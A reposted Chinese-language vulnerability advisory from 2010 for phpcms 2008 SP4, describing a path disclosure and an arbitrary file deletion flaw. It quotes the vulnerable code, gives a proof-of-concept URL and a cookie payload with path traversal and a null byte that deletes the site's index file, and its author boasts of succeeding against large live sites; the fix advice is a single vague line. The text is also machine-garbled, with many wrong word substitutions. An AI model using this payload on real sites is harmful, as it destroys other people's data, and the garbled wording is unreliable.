日期:2010-09-07 00:18:00 来源:本站整理
phpcms 2008 sp4 爆途径及肆意文件删除漏洞及修复[网络技术]
本文“phpcms 2008 sp4 爆途径及肆意文件删除漏洞及修复[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
公布日期:2010-09.05
公布作者:CnCxzSec(衰仔)
影响版本:phpcms 2008 sp4
官方地址:www.phpcms.cn
漏洞范例:爆途径及肆意文件删除
漏洞描写:某页面下,未作容错处理招致爆途径,同时过滤不严招致恶意攻击者可以删除网站肆意文件
具体阐明:corpandresize/config.inc.php中定义:
$tmp = $_COOKIE['tmp'];
define("TMP_PATH", $tmp);
在corpandresize/process.php顶用到TMP_PATH,满意前面的一系列条件后(这个很好满意,都是用户可控的):
76: @unlink(TMP_PATH.'/'.$thumbfile);
没有查抄$_COOKIE['tmp']就直接放入unlink()了,只要改正cookie便可以删除网站的肆意文件.
谷歌了一下,发现网上有人在本年5月份公开过同目录下另一个文件造成的爆途径问题(http://lcx.cc/?FoxNews=123.html),但解析得不够具体,操纵办法也稍显麻烦,这里给出的操纵方法更简单.
漏洞证明:注册用户登陆后拜候
http://localhost/phpcms/corpandresize/process.php?pic=../images/logo.gif
此时爆出绝对途径(当汇集信息,没什么好操纵的)
在cookie中增添一句(或改正原有值)tmp=../index.php%00便可删除首页文件
测试的时刻发现官方demo站不成功...但是本地测试ok(官方最新安装包),在网上找大站测试,一打一个准~
修复筹划:
改正容错处理,加强过滤
以上是“phpcms 2008 sp4 爆途径及肆意文件删除漏洞及修复[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |
评论内容只代表网友观点,与本站立场无关!
评论摘要(共 0 条,得分 0 分,平均 0 分)
查看完整评论